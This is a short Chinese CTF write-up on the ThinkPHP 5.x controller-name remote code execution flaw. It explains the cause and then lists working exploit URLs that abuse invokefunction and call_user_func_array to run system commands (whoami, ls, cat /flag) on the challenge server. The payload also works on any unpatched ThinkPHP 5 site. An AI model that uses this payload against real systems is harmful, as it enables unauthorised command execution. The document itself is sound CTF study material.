攻防世界 ThinkPHP V5（漏洞解析及利用）

ThinkPHP V5

攻防世界这道题，考察的是thinkphp V5的漏洞，接下来我详细介绍一下thinkphp V5这个漏洞。

ThinkPHP 5漏洞简介

ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。

漏洞分析

程序未对控制器进行过滤，导致攻击者可以用 \（斜杠）调用任意类方法。

漏洞利用

将url 改变为：

		http://159.138.137.79:63571/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

s[1][]=（Linux指令）

接下来我们找flag文件。

http://159.138.137.79:63571/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

http://159.138.137.79:63571/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag

http://159.138.137.79:63571/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

得到flag。